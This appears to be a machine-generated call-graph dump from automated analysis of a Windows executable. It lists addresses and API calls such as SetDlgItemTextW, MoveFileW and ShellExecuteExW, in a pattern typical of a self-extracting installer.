7ff71613ee77 26581->26585 26582 7ff71613eee8 27302 7ff716112004 33 API calls std::_Xinvalid_argument 26582->27302 26583 7ff7161113a4 33 API calls 26586 7ff71613dc3a GetTempPathW 26583->26586 26587 7ff71613ef18 26584->26587 27300 7ff71613abe8 33 API calls 3 library calls 26585->27300 26586->26695 26594 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26587->26594 26588 7ff7161262dc 35 API calls 26588->26695 26592 7ff71613ee8d 26601 7ff716111fa0 31 API calls 26592->26601 26605 7ff71613eea4 BuildCatchObjectHelperInternal 26592->26605 26593 7ff716112520 SetDlgItemTextW 26593->26695 26598 7ff71613ef1e 26594->26598 26597 7ff71614bb8c 43 API calls 26597->26695 26606 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26598->26606 26600 7ff71613e7f3 26600->26580 26600->26582 26604 7ff7161421d0 33 API calls 26600->26604 26616 7ff71613e83b BuildCatchObjectHelperInternal 26600->26616 26601->26605 26602 7ff716111fa0 31 API calls 26602->26580 26603 7ff716112034 33 API calls 26603->26695 26604->26616 26605->26602 26608 7ff71613ef24 26606->26608 26607 7ff71613aa08 33 API calls 26607->26695 26614 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26608->26614 26610 7ff7161120b0 33 API calls 26610->26695 26611 7ff71613ef6c 27308 7ff716112004 33 API calls std::_Xinvalid_argument 26611->27308 26612 7ff71613ef78 27310 7ff716112004 33 API calls std::_Xinvalid_argument 26612->27310 26613 7ff716114228 33 API calls 26613->26695 26619 7ff71613ef2a 26614->26619 26615 7ff716123f30 54 API calls 26615->26695 26623 7ff7161120b0 33 API calls 26616->26623 26664 7ff71613eb8f 26616->26664 26618 7ff716111fa0 31 API calls 26618->26578 26629 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26619->26629 26620 7ff71613ef72 27309 7ff716111f80 33 API calls 3 library calls 26620->27309 26622 7ff71613ef66 27307 7ff716111f80 33 API calls 3 library calls 26622->27307 26630 7ff71613e963 26623->26630 26626 7ff71613ed40 26626->26612 26626->26620 26644 7ff71613ed3b BuildCatchObjectHelperInternal 26626->26644 26648 7ff7161421d0 33 API calls 26626->26648 26628 7ff71613ec2a 26628->26611 26628->26622 26639 7ff71613ec72 BuildCatchObjectHelperInternal 26628->26639 26628->26644 26646 7ff7161421d0 33 API calls 26628->26646 26636 7ff71613ef30 26629->26636 26638 7ff71613ef60 26630->26638 26645 7ff71611129c 33 API calls 26630->26645 26633 7ff71612dc2c 33 API calls 26633->26695 26635 7ff7161399c8 31 API calls 26635->26695 26649 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26636->26649 26637 7ff716123d34 51 API calls 26637->26695 27306 7ff71611704c 47 API calls BuildCatchObjectHelperInternal 26638->27306 27214 7ff71613f4e0 26639->27214 26641 7ff71613d5e9 GetDlgItem 26647 7ff716112520 SetDlgItemTextW 26641->26647 26644->26618 26650 7ff71613e9a6 26645->26650 26646->26639 26651 7ff71613d608 IsDlgButtonChecked 26647->26651 26648->26644 26652 7ff71613ef36 26649->26652 27296 7ff71612d22c 26650->27296 26651->26695 26657 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26652->26657 26655 7ff716125b60 53 API calls 26655->26695 26656 7ff71613d63c IsDlgButtonChecked 26656->26695 26661 7ff71613ef3c 26657->26661 26665 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26661->26665 26663 7ff71613ef54 26668 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26663->26668 26664->26626 26664->26628 26664->26663 26667 7ff71613ef5a 26664->26667 26666 7ff71613ef42 26665->26666 26672 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26666->26672 26671 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26667->26671 26668->26667 26669 7ff716118d04 33 API calls 26669->26695 26671->26638 26674 7ff71613ef48 26672->26674 26673 7ff7161232a8 51 API calls 26673->26695 26677 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26674->26677 26675 7ff716125820 33 API calls 26675->26695 26676 7ff716125aa8 33 API calls 26676->26695 26680 7ff71613ef4e 26677->26680 26678 7ff71611e164 33 API calls 26678->26695 26679 7ff71611250c SetDlgItemTextW 26679->26695 26684 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26680->26684 26683 7ff716111150 33 API calls 26683->26695 26684->26663 26685 7ff7161313c4 CompareStringW 26696 7ff71613e9d1 26685->26696 26687 7ff716111fa0 31 API calls 26687->26696 26688 7ff71611129c 33 API calls 26688->26695 26689 7ff71611129c 33 API calls 26689->26696 26690 7ff716112674 31 API calls 26690->26695 26692 7ff71613df99 EndDialog 26692->26695 26694 7ff7161232bc 51 API calls 26694->26695 26695->26557 26695->26560 26695->26563 26695->26566 26695->26568 26695->26570 26695->26573 26695->26574 26695->26578 26695->26579 26695->26583 26695->26587 26695->26588 26695->26593 26695->26597 26695->26598 26695->26600 26695->26603 26695->26607 26695->26608 26695->26610 26695->26613 26695->26615 26695->26619 26695->26633 26695->26635 26695->26636 26695->26637 26695->26652 26695->26655 26695->26656 26695->26661 26695->26666 26695->26669 26695->26673 26695->26675 26695->26676 26695->26678 26695->26679 26695->26683 26695->26688 26695->26690 26695->26692 26695->26694 26698 7ff71613db21 MoveFileW 26695->26698 26701 7ff716122f58 56 API calls 26695->26701 26704 7ff716111fa0 31 API calls 26695->26704 27175 7ff7161313c4 CompareStringW 26695->27175 27176 7ff71613a440 26695->27176 27252 7ff71612cfa4 35 API calls _invalid_parameter_noinfo_noreturn 26695->27252 27253 7ff7161395b4 33 API calls Concurrency::cancel_current_task 26695->27253 27254 7ff716140684 31 API calls _invalid_parameter_noinfo_noreturn 26695->27254 27255 7ff71611df4c 47 API calls BuildCatchObjectHelperInternal 26695->27255 27256 7ff71613a834 33 API calls _invalid_parameter_noinfo_noreturn 26695->27256 27257 7ff716139518 33 API calls 26695->27257 27258 7ff71613abe8 33 API calls 3 library calls 26695->27258 27259 7ff716127368 33 API calls 2 library calls 26695->27259 27260 7ff716124088 33 API calls 26695->27260 27261 7ff7161265b0 33 API calls 3 library calls 26695->27261 27262 7ff7161272cc 26695->27262 27266 7ff716111744 33 API calls 4 library calls 26695->27266 27267 7ff7161231bc 26695->27267 27281 7ff716123ea0 FindClose 26695->27281 27282 7ff7161313f4 CompareStringW 26695->27282 27283 7ff716139cd0 47 API calls 26695->27283 27284 7ff7161387d8 51 API calls 3 library calls 26695->27284 27285 7ff71613ab54 33 API calls _handle_error 26695->27285 27286 7ff716127df4 26695->27286 27294 7ff716125b08 CompareStringW 26695->27294 27295 7ff716127eb0 47 API calls 26695->27295 26696->26664 26696->26674 26696->26680 26696->26685 26696->26687 26696->26689 26697 7ff71612d22c 33 API calls 26696->26697 26697->26696 26699 7ff71613db55 MoveFileExW 26698->26699 26702 7ff71613db70 26698->26702 26699->26702 26700 7ff716111fa0 31 API calls 26700->26702 26701->26695 26702->26695 26702->26700 26704->26695 26706 7ff71613f9a3 26705->26706 26707 7ff7161120b0 33 API calls 26706->26707 26708 7ff71613f9b9 26707->26708 26709 7ff71613f9ee 26708->26709 26710 7ff7161120b0 33 API calls 26708->26710 27324 7ff71611e34c 26709->27324 26710->26709 26712 7ff71613fa4b 27344 7ff71611e7a8 26712->27344 26716 7ff71613fa61 26717 7ff716142320 _handle_error 8 API calls 26716->26717 26718 7ff71613bc52 26717->26718 26718->26343 28488 7ff71613849c 26720->28488 26723 7ff71613f4b7 26725 7ff716142320 _handle_error 8 API calls 26723->26725 26724 7ff71613f3c7 GetWindow 26726 7ff71613f3e2 26724->26726 26727 7ff71613be9b 26725->26727 26726->26723 26728 7ff71613f3ee GetClassNameW 26726->26728 26730 7ff71613f417 GetWindowLongPtrW 26726->26730 26731 7ff71613f496 GetWindow 26726->26731 26727->26102 26727->26103 28493 7ff7161313c4 CompareStringW 26728->28493 26730->26731 26732 7ff71613f429 IsDlgButtonChecked 26730->26732 26731->26723 26731->26726 26732->26731 26733 7ff71613f445 GetObjectW 26732->26733 28494 7ff716138504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26733->28494 26735 7ff71613f461 28495 7ff7161384cc 26735->28495 28499 7ff716138df4 16 API calls _handle_error 26735->28499 26738 7ff71613f479 IsDlgButtonChecked DeleteObject 26738->26731 26740 7ff716126300 26739->26740 26745 7ff71612638d 26739->26745 26741 7ff7161113a4 33 API calls 26740->26741 26742 7ff71612631b GetCurrentDirectoryW 26741->26742 26743 7ff716126341 26742->26743 26744 7ff7161120b0 33 API calls 26743->26744 26746 7ff71612634f 26744->26746 26745->26117 26746->26745 26747 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26746->26747 26748 7ff7161263a9 26747->26748 26750 7ff716112527 26749->26750 26751 7ff71611252a SetDlgItemTextW 26749->26751 26750->26751 26752 7ff71617e2e0 26751->26752 26753->26128 26755 7ff716112513 26754->26755 26756 7ff716112516 SetDlgItemTextW 26754->26756 26755->26756 26758 7ff71611139b 26757->26758 26759 7ff7161112d0 26757->26759 28503 7ff716112004 33 API calls std::_Xinvalid_argument 26758->28503 26762 7ff716111338 26759->26762 26763 7ff716111396 26759->26763 26766 7ff7161112de BuildCatchObjectHelperInternal 26759->26766 26765 7ff7161421d0 33 API calls 26762->26765 26762->26766 28502 7ff716111f80 33 API calls 3 library calls 26763->28502 26765->26766 26766->26165 26767->26195 26769 7ff7161232bc 51 API calls 26768->26769 26770 7ff7161232b1 26769->26770 26770->26207 26770->26231 26771->26207 26773 7ff7161113a4 33 API calls 26772->26773 26774 7ff716126489 26773->26774 26775 7ff71612648c GetModuleFileNameW 26774->26775 26778 7ff7161264dc 26774->26778 26776 7ff7161264a7 26775->26776 26777 7ff7161264de 26775->26777 26776->26774 26777->26778 26779 7ff71611129c 33 API calls 26778->26779 26781 7ff716126506 26779->26781 26780 7ff71612653e 26780->26272 26781->26780 26782 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26781->26782 26783 7ff716126560 26782->26783 26784->26288 26786 7ff7161120f6 26785->26786 26788 7ff7161120cb BuildCatchObjectHelperInternal 26785->26788 28504 7ff716111474 33 API calls 3 library calls 26786->28504 26788->26305 26789->26314 26790->26326 26791->26336 26792->26341 26793->26350 26795 7ff716143620 26794->26795 26795->26354 26796->26270 26798 7ff716111177 26797->26798 26799 7ff716112034 33 API calls 26798->26799 26800 7ff716111185 BuildCatchObjectHelperInternal 26799->26800 26800->26285 26802 7ff716112085 26801->26802 26804 7ff716112059 BuildCatchObjectHelperInternal 26801->26804 28505 7ff7161115b8 33 API calls 3 library calls 26802->28505 26804->26259 26806 7ff716142329 26805->26806 26807 7ff71613c350 26806->26807 26808 7ff716142550 IsProcessorFeaturePresent 26806->26808 26809 7ff716142568 26808->26809 28506 7ff716142744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26809->28506 26811 7ff71614257b 28507 7ff716142510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26811->28507 28508 7ff71614783c 31 API calls 3 library calls 26814->28508 26816 7ff71614791d 28509 7ff716147934 16 API calls abort 26816->28509 26819->26307 26820->26374 26821->26399 26822->26414 26823->26426 26849 7ff716123e28 26824->26849 26828 7ff71612a589 26855 7ff716129408 26828->26855 26829 7ff71612a519 26829->26828 26847 7ff71612a56a SetDlgItemTextW 26829->26847 26870 7ff716129800 26829->26870 26832 7ff71612a6f2 GetSystemMetrics GetWindow 26834 7ff71612a71d 26832->26834 26835 7ff71612a821 26832->26835 26833 7ff71612a603 26836 7ff71612a60c GetWindowLongPtrW 26833->26836 26837 7ff71612a6c2 26833->26837 26834->26835 26846 7ff71612a73e GetWindowRect 26834->26846 26848 7ff71612a800 GetWindow 26834->26848 26838 7ff716142320 _handle_error 8 API calls 26835->26838 26839 7ff71617e2c0 26836->26839 26874 7ff7161295a8 26837->26874 26842 7ff71612a830 26838->26842 26843 7ff71612a6aa GetWindowRect 26839->26843 26842->26439 26843->26837 26845 7ff71612a6e5 SetDlgItemTextW 26845->26832 26846->26834 26847->26829 26848->26834 26848->26835 26850 7ff716123e4d swprintf 26849->26850 26883 7ff716149ef0 26850->26883 26853 7ff716130f68 WideCharToMultiByte 26854 7ff716130faa 26853->26854 26854->26829 26856 7ff7161295a8 47 API calls 26855->26856 26857 7ff71612944f 26856->26857 26858 7ff71612955a 26857->26858 26861 7ff71611129c 33 API calls 26857->26861 26859 7ff716142320 _handle_error 8 API calls 26858->26859 26860 7ff71612958e GetWindowRect GetClientRect 26859->26860 26860->26832 26860->26833 26862 7ff71612949c 26861->26862 26863 7ff7161295a1 26862->26863 26864 7ff71611129c 33 API calls 26862->26864 26865 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26863->26865 26867 7ff716129514 26864->26867 26866 7ff7161295a7 26865->26866 26867->26858 26868 7ff71612959c 26867->26868 26869 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26868->26869 26869->26863 26871 7ff716129840 26870->26871 26873 7ff716129869 26870->26873 26922 7ff71614a270 31 API calls 2 library calls 26871->26922 26873->26829 26875 7ff716123e28 swprintf 46 API calls 26874->26875 26876 7ff7161295eb 26875->26876 26877 7ff716130f68 WideCharToMultiByte 26876->26877 26878 7ff716129603 26877->26878 26879 7ff716129800 31 API calls 26878->26879 26880 7ff71612961b 26879->26880 26881 7ff716142320 _handle_error 8 API calls 26880->26881 26882 7ff71612962b 26881->26882 26882->26832 26882->26845 26884 7ff716149f4e 26883->26884 26885 7ff716149f36 26883->26885 26884->26885 26887 7ff716149f58 26884->26887 26910 7ff71614d69c 15 API calls abort 26885->26910 26912 7ff716147ef0 35 API calls 2 library calls 26887->26912 26888 7ff716149f3b 26911 7ff7161478e4 31 API calls _invalid_parameter_noinfo 26888->26911 26891 7ff716142320 _handle_error 8 API calls 26893 7ff716123e69 26891->26893 26892 7ff716149f69 memcpy_s 26913 7ff716147e70 15 API calls _set_fmode 26892->26913 26893->26853 26895 7ff716149fd4 26914 7ff7161482f8 46 API calls 3 library calls 26895->26914 26897 7ff716149fdd 26898 7ff71614a014 26897->26898 26899 7ff716149fe5 26897->26899 26901 7ff71614a06c 26898->26901 26902 7ff71614a023 26898->26902 26903 7ff71614a092 26898->26903 26904 7ff71614a01a 26898->26904 26915 7ff71614d90c 26899->26915 26905 7ff71614d90c __free_lconv_mon 15 API calls 26901->26905 26907 7ff71614d90c __free_lconv_mon 15 API calls 26902->26907 26903->26901 26906 7ff71614a09c 26903->26906 26904->26901 26904->26902 26909 7ff716149f46 26905->26909 26908 7ff71614d90c __free_lconv_mon 15 API calls 26906->26908 26907->26909 26908->26909 26909->26891 26910->26888 26911->26909 26912->26892 26913->26895 26914->26897 26916 7ff71614d911 RtlRestoreThreadPreferredUILanguages 26915->26916 26920 7ff71614d941 __free_lconv_mon 26915->26920 26917 7ff71614d92c 26916->26917 26916->26920 26921 7ff71614d69c 15 API calls abort 26917->26921 26919 7ff71614d931 GetLastError 26919->26920 26920->26909 26921->26919 26922->26873 26935 7ff7161113a4 26923->26935 26926 7ff716112494 26927 7ff71611129c 33 API calls 26926->26927 26928 7ff7161124a2 26927->26928 26930 7ff716112505 26928->26930 26931 7ff7161124dd 26928->26931 26929 7ff716142320 _handle_error 8 API calls 26932 7ff7161124f3 26929->26932 26933 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26930->26933 26931->26929 26932->26448 26934 7ff71611250a 26933->26934 26936 7ff7161113ad 26935->26936 26944 7ff71611142d GetWindowTextW 26935->26944 26937 7ff71611143d 26936->26937 26938 7ff7161113ce 26936->26938 26955 7ff716112018 33 API calls std::_Xinvalid_argument 26937->26955 26942 7ff7161113db memcpy_s 26938->26942 26945 7ff7161421d0 26938->26945 26954 7ff71611197c 31 API calls _invalid_parameter_noinfo_noreturn 26942->26954 26944->26926 26946 7ff7161421db 26945->26946 26947 7ff7161421f4 26946->26947 26948 7ff71614bbc0 abort 2 API calls 26946->26948 26949 7ff7161421fa 26946->26949 26947->26942 26948->26946 26952 7ff716142205 26949->26952 26956 7ff716142f7c RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 26949->26956 26957 7ff716111f80 33 API calls 3 library calls 26952->26957 26953 7ff71614220b 26954->26944 26956->26952 26957->26953 26958->26465 26960->26473 26968 7ff716129638 26961->26968 26964 7ff7161297d9 26966 7ff716142320 _handle_error 8 API calls 26964->26966 26965 7ff716129800 31 API calls 26965->26964 26967 7ff7161297f2 26966->26967 26967->26485 26967->26486 26969 7ff716129692 26968->26969 26977 7ff716129730 26968->26977 26970 7ff716130f68 WideCharToMultiByte 26969->26970 26971 7ff7161296c0 26969->26971 26970->26971 26976 7ff7161296ef 26971->26976 26978 7ff71612aa88 45 API calls 2 library calls 26971->26978 26972 7ff716142320 _handle_error 8 API calls 26973 7ff716129764 26972->26973 26973->26964 26973->26965 26979 7ff71614a270 31 API calls 2 library calls 26976->26979 26977->26972 26978->26976 26979->26977 26996 7ff71612d4d0 26980->26996 26984 7ff716149ef0 swprintf 46 API calls 26985 7ff71612d8e5 swprintf 26984->26985 26985->26984 26993 7ff71612d974 26985->26993 27010 7ff716119d78 33 API calls 26985->27010 26986 7ff71612d9a3 26988 7ff71612da17 26986->26988 26990 7ff71612da3f 26986->26990 26989 7ff716142320 _handle_error 8 API calls 26988->26989 26991 7ff71612da2b 26989->26991 26992 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 26990->26992 26991->26491 26994 7ff71612da44 26992->26994 26993->26986 27011 7ff716119d78 33 API calls 26993->27011 26997 7ff71612d665 26996->26997 26998 7ff71612d502 26996->26998 27000 7ff71612cb80 26997->27000 26998->26997 26999 7ff716111744 33 API calls 26998->26999 26999->26998 27001 7ff71612cbb6 27000->27001 27008 7ff71612cc80 27000->27008 27002 7ff71612cbc6 27001->27002 27005 7ff71612cc7b 27001->27005 27006 7ff71612cc20 27001->27006 27002->26985 27012 7ff716111f80 33 API calls 3 library calls 27005->27012 27006->27002 27009 7ff7161421d0 33 API calls 27006->27009 27013 7ff716112004 33 API calls std::_Xinvalid_argument 27008->27013 27009->27002 27010->26985 27011->26986 27012->27008 27015 7ff71613ae3c GetMessageW 27014->27015 27016 7ff71613ae80 GetDlgItem 27014->27016 27017 7ff71613ae6a TranslateMessage DispatchMessageW 27015->27017 27018 7ff71613ae5b IsDialogMessageW 27015->27018 27016->26494 27016->26495 27017->27016 27018->27016 27018->27017 27021 7ff7161236b3 27019->27021 27020 7ff7161236e0 27039 7ff7161232bc 27020->27039 27021->27020 27022 7ff7161236cc CreateDirectoryW 27021->27022 27022->27020 27026 7ff71612377d 27022->27026 27025 7ff71612378d 27030 7ff716142320 _handle_error 8 API calls 27025->27030 27026->27025 27053 7ff716123d34 27026->27053 27027 7ff716123791 GetLastError 27027->27025 27032 7ff7161237b9 27030->27032 27032->26512 27033 7ff71612373b 27035 7ff716123774 27033->27035 27036 7ff7161237ce 27033->27036 27034 7ff716123720 CreateDirectoryW 27034->27033 27035->27026 27035->27027 27037 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27036->27037 27038 7ff7161237d3 27037->27038 27040 7ff7161232e7 GetFileAttributesW 27039->27040 27041 7ff7161232e4 27039->27041 27042 7ff7161232f8 27040->27042 27049 7ff716123375 27040->27049 27041->27040 27043 7ff716126a0c 49 API calls 27042->27043 27045 7ff71612331f 27043->27045 27044 7ff716142320 _handle_error 8 API calls 27046 7ff716123389 27044->27046 27047 7ff71612333c 27045->27047 27048 7ff716123323 GetFileAttributesW 27045->27048 27046->27027 27067 7ff716126a0c 27046->27067 27047->27049 27050 7ff716123399 27047->27050 27048->27047 27049->27044 27051 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27050->27051 27052 7ff71612339e 27051->27052 27054 7ff716123d5b 27053->27054 27055 7ff716123d5e SetFileAttributesW 27053->27055 27054->27055 27056 7ff716123d74 27055->27056 27063 7ff716123df5 27055->27063 27058 7ff716126a0c 49 API calls 27056->27058 27057 7ff716142320 _handle_error 8 API calls 27059 7ff716123e0a 27057->27059 27060 7ff716123d99 27058->27060 27059->27025 27061 7ff716123dbc 27060->27061 27062 7ff716123d9d SetFileAttributesW 27060->27062 27061->27063 27064 7ff716123e1a 27061->27064 27062->27061 27063->27057 27065 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27064->27065 27066 7ff716123e1f 27065->27066 27068 7ff716126a4b 27067->27068 27089 7ff716126a44 27067->27089 27070 7ff71611129c 33 API calls 27068->27070 27069 7ff716142320 _handle_error 8 API calls 27071 7ff71612371c 27069->27071 27072 7ff716126a76 27070->27072 27071->27033 27071->27034 27073 7ff716126cc7 27072->27073 27074 7ff716126a96 27072->27074 27075 7ff7161262dc 35 API calls 27073->27075 27076 7ff716126ab0 27074->27076 27100 7ff716126b49 27074->27100 27080 7ff716126ce6 27075->27080 27077 7ff7161270ab 27076->27077 27140 7ff71611c098 33 API calls 2 library calls 27076->27140 27148 7ff716112004 33 API calls std::_Xinvalid_argument 27077->27148 27079 7ff716126eef 27083 7ff7161270cf 27079->27083 27145 7ff71611c098 33 API calls 2 library calls 27079->27145 27080->27079 27084 7ff716126d1b 27080->27084 27086 7ff716126b44 27080->27086 27081 7ff7161270b1 27092 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27081->27092 27151 7ff716112004 33 API calls std::_Xinvalid_argument 27083->27151 27091 7ff7161270bd 27084->27091 27143 7ff71611c098 33 API calls 2 library calls 27084->27143 27085 7ff7161270d5 27093 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27085->27093 27086->27081 27086->27085 27086->27089 27094 7ff7161270a6 27086->27094 27088 7ff716126b03 27101 7ff716111fa0 31 API calls 27088->27101 27107 7ff716126b15 BuildCatchObjectHelperInternal 27088->27107 27089->27069 27149 7ff716112004 33 API calls std::_Xinvalid_argument 27091->27149 27098 7ff7161270b7 27092->27098 27099 7ff7161270db 27093->27099 27105 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27094->27105 27095 7ff716126f56 27146 7ff7161111cc 33 API calls BuildCatchObjectHelperInternal 27095->27146 27109 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27098->27109 27111 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27099->27111 27100->27086 27106 7ff71611129c 33 API calls 27100->27106 27101->27107 27103 7ff7161270c3 27114 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27103->27114 27104 7ff716111fa0 31 API calls 27104->27086 27105->27077 27112 7ff716126bbe 27106->27112 27107->27104 27108 7ff716126f69 27147 7ff7161257ac 33 API calls BuildCatchObjectHelperInternal 27108->27147 27109->27091 27110 7ff716111fa0 31 API calls 27115 7ff716126df5 27110->27115 27116 7ff7161270e1 27111->27116 27141 7ff716125820 33 API calls 27112->27141 27118 7ff7161270c9 27114->27118 27122 7ff716126e21 27115->27122 27144 7ff716111744 33 API calls 4 library calls 27115->27144 27150 7ff71611704c 47 API calls BuildCatchObjectHelperInternal 27118->27150 27119 7ff716126d76 BuildCatchObjectHelperInternal 27119->27103 27119->27110 27120 7ff716126bd3 27142 7ff71611e164 33 API calls 2 library calls 27120->27142 27121 7ff716126f79 BuildCatchObjectHelperInternal 27121->27099 27123 7ff716111fa0 31 API calls 27121->27123 27122->27118 27134 7ff71611129c 33 API calls 27122->27134 27126 7ff716126fec 27123->27126 27127 7ff716111fa0 31 API calls 27126->27127 27130 7ff716126ff6 27127->27130 27129 7ff716111fa0 31 API calls 27132 7ff716126c6d 27129->27132 27133 7ff716111fa0 31 API calls 27130->27133 27131 7ff716126be9 BuildCatchObjectHelperInternal 27131->27098 27131->27129 27135 7ff716111fa0 31 API calls 27132->27135 27133->27086 27136 7ff716126ec2 27134->27136 27135->27086 27137 7ff716112034 33 API calls 27136->27137 27138 7ff716126edf 27137->27138 27139 7ff716111fa0 31 API calls 27138->27139 27139->27086 27140->27088 27141->27120 27142->27131 27143->27119 27144->27122 27145->27095 27146->27108 27147->27121 27150->27083 27153 7ff71611713b 27152->27153 27154 7ff716117206 27152->27154 27160 7ff71611714b BuildCatchObjectHelperInternal 27153->27160 27161 7ff716113f48 33 API calls 2 library calls 27153->27161 27162 7ff71611704c 47 API calls BuildCatchObjectHelperInternal 27154->27162 27157 7ff71611720b 27158 7ff716117273 27157->27158 27163 7ff71611889c 8 API calls BuildCatchObjectHelperInternal 27157->27163 27158->26529 27160->26529 27161->27160 27162->27157 27163->27157 27165 7ff716122102 27164->27165 27166 7ff7161220ea 27164->27166 27167 7ff716122126 27165->27167 27170 7ff71611b544 99 API calls 27165->27170 27166->27165 27168 7ff7161220f6 FindCloseChangeNotification 27166->27168 27167->26553 27168->27165 27170->27167 27172 7ff71613aa2f 27171->27172 27173 7ff71613aa36 27171->27173 27172->26695 27173->27172 27311 7ff716111744 33 API calls 4 library calls 27173->27311 27175->26695 27177 7ff71613a47f 27176->27177 27197 7ff71613a706 27176->27197 27312 7ff71613cdf8 33 API calls 27177->27312 27179 7ff716142320 _handle_error 8 API calls 27181 7ff71613a717 27179->27181 27180 7ff71613a49e 27182 7ff71611129c 33 API calls 27180->27182 27181->26641 27183 7ff71613a4de 27182->27183 27184 7ff71611129c 33 API calls 27183->27184 27185 7ff71613a517 27184->27185 27186 7ff71611129c 33 API calls 27185->27186 27187 7ff71613a54a 27186->27187 27313 7ff71613a834 33 API calls _invalid_parameter_noinfo_noreturn 27187->27313 27189 7ff71613a73a 27191 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27189->27191 27190 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27190->27189 27192 7ff71613a740 27191->27192 27195 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27192->27195 27193 7ff71613a573 27193->27189 27193->27192 27194 7ff71613a685 27193->27194 27196 7ff7161120b0 33 API calls 27193->27196 27204 7ff71613a734 27193->27204 27194->27197 27198 7ff71613a746 27194->27198 27199 7ff71613a72f 27194->27199 27195->27198 27196->27194 27197->27179 27200 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27198->27200 27202 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27199->27202 27201 7ff71613a74c 27200->27201 27203 7ff71611255c 61 API calls 27201->27203 27202->27204 27205 7ff71613a795 27203->27205 27204->27190 27206 7ff71613a7b1 27205->27206 27207 7ff71613a801 SetDlgItemTextW 27205->27207 27211 7ff71613a7a1 27205->27211 27208 7ff716142320 _handle_error 8 API calls 27206->27208 27207->27206 27209 7ff71613a827 27208->27209 27209->26641 27210 7ff71613a7ad 27210->27206 27212 7ff71613a7b7 EndDialog 27210->27212 27211->27206 27211->27210 27314 7ff71612bb00 102 API calls 27211->27314 27212->27206 27219 7ff71613f529 memcpy_s 27214->27219 27229 7ff71613f87d 27214->27229 27215 7ff716111fa0 31 API calls 27216 7ff71613f89c 27215->27216 27217 7ff716142320 _handle_error 8 API calls 27216->27217 27218 7ff71613f8a8 27217->27218 27218->26644 27220 7ff71613f684 27219->27220 27315 7ff7161313c4 CompareStringW 27219->27315 27222 7ff71611129c 33 API calls 27220->27222 27223 7ff71613f6c0 27222->27223 27224 7ff7161232a8 51 API calls 27223->27224 27225 7ff71613f6ca 27224->27225 27226 7ff716111fa0 31 API calls 27225->27226 27230 7ff71613f6d5 27226->27230 27227 7ff71613f742 ShellExecuteExW 27228 7ff71613f846 27227->27228 27236 7ff71613f755 27227->27236 27228->27229 27234 7ff71613f8fb 27228->27234 27229->27215 27230->27227 27232 7ff71611129c 33 API calls 27230->27232 27231 7ff71613f78e 27317 7ff71613fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27231->27317 27233 7ff71613f717 27232->27233 27316 7ff716125b60 53 API calls 2 library calls 27233->27316 27238 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27234->27238 27235 7ff71613f7e3 CloseHandle 27239 7ff71613f7f2 27235->27239 27240 7ff71613f801 27235->27240 27236->27231 27236->27235 27245 7ff71613f781 ShowWindow 27236->27245 27243 7ff71613f900 27238->27243 27318 7ff7161313c4 CompareStringW 27239->27318 27240->27228 27249 7ff71613f837 ShowWindow 27240->27249 27242 7ff71613f725 27247 7ff716111fa0 31 API calls 27242->27247 27245->27231 27246 7ff71613f7a6 27246->27235 27250 7ff71613f7b4 GetExitCodeProcess 27246->27250 27248 7ff71613f72f 27247->27248 27248->27227 27249->27228 27250->27235 27251 7ff71613f7c7 27250->27251 27251->27235 27252->26695 27253->26695 27254->26695 27255->26695 27256->26695 27257->26695 27258->26695 27259->26695 27260->26695 27261->26695 27263 7ff7161272ea 27262->27263 27319 7ff71611b3a8 27263->27319 27266->26695 27268 7ff7161231e7 DeleteFileW 27267->27268 27269 7ff7161231e4 27267->27269 27270 7ff7161231fd 27268->27270 27271 7ff71612327c 27268->27271 27269->27268 27272 7ff716126a0c 49 API calls 27270->27272 27273 7ff716142320 _handle_error 8 API calls 27271->27273 27274 7ff716123222 27272->27274 27275 7ff716123291 27273->27275 27276 7ff716123243 27274->27276 27277 7ff716123226 DeleteFileW 27274->27277 27275->26695 27276->27271 27278 7ff7161232a1 27276->27278 27277->27276 27279 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27278->27279 27280 7ff7161232a6 27279->27280 27282->26695 27283->26695 27284->26695 27285->26695 27287 7ff716127e0c 27286->27287 27288 7ff716127e23 27287->27288 27289 7ff716127e55 27287->27289 27291 7ff71611129c 33 API calls 27288->27291 27323 7ff71611704c 47 API calls BuildCatchObjectHelperInternal 27289->27323 27293 7ff716127e47 27291->27293 27292 7ff716127e5a 27293->26695 27294->26695 